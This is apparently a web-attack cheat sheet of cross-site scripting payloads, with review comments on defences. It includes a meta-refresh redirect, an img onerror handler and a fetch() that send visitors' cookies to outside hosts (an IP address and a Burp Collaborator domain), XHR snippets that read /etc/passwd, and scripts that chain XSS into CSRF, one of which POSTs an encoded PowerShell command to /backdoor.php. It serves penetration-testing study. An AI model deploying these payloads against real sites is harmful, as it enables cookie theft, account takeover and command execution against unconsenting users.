XSS

Cross-Site Scripting

Ultimate checker: '"/><script>print()</script>.

Redirections

<!-- Injected <meta> refresh: once this markup lands in a response, the browser navigates to the given URL with no script involved.
     NOTE(review): a script-blocking CSP does not stop a meta refresh; context-aware output encoding of untrusted HTML is the control. -->
<head> 
  <meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>

Data Grabbers

Cookies

Img tag:

<!-- The unresolvable src forces onerror; the handler then issues a GET to the listed host with document.cookie base64-encoded in the query string.
     NOTE(review): cookies flagged HttpOnly are absent from document.cookie. A CSP img-src allowlist and alerting on outbound requests that carry base64 query values to unexpected hosts are the other controls. -->
<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">

Fetch:

<script>
// POSTs document.cookie as the raw request body to the collaborator host.
// mode: 'no-cors' — the browser sends the request, but the response is opaque and is never read here.
// NOTE(review): HttpOnly cookies are not exposed through document.cookie; CSP connect-src limits where fetch() may send.
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

XMLHttpRequest

XSS to LFI

<script>
// GETs file:///etc/passwd over XHR and writes the response body into the current document.
// NOTE(review): browsers treat file:// as a separate origin from any http(s) page, so this returns content only where the script itself already runs from a file:// (or equally unrestricted) context; from a normal web origin the request is blocked.
var xhr = new XMLHttpRequest;
xhr.onload = function() {
	document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
<!-- Single-line form of the XHR snippet above (same request, same document.write of the response); the file:// origin restriction applies identically. -->
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script>

XSS to CSRF

If the endpoint is accessible only from localhost:

<script>
// Same-origin POST issued from the victim's browser; the ActiveXObject branch is the legacy IE fallback.
// NOTE(review): a host/IP restriction on the endpoint is not a defense against script running in a browser on that host — the request arrives from localhost and carries the session cookie automatically. The endpoint needs its own authentication.
var xhr;
if (window.XMLHttpRequest) {
	xhr = new XMLHttpRequest();
} else {
	xhr = new ActiveXObject("Microsoft.XMLHTTP");
}
xhr.open("POST", "/backdoor.php");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("cmd=powershell -enc ...");
</script>

Capturing the CSRF token first:

<script>
// Two-step same-origin flow: GET /email, extract the csrf hidden-field value from the HTML, then POST it with the new address.
// NOTE(review): an anti-CSRF token does not mitigate XSS — script on the same origin reads the token just as this does; the XSS sink itself is what must be fixed.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/email', true);
req.send();
function handleResponse() {
    // Pulls the token out of the response markup via regex.
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/email/change-email', true);
    changeReq.send('csrf='+token+'&email=test@example.com')
};
</script>
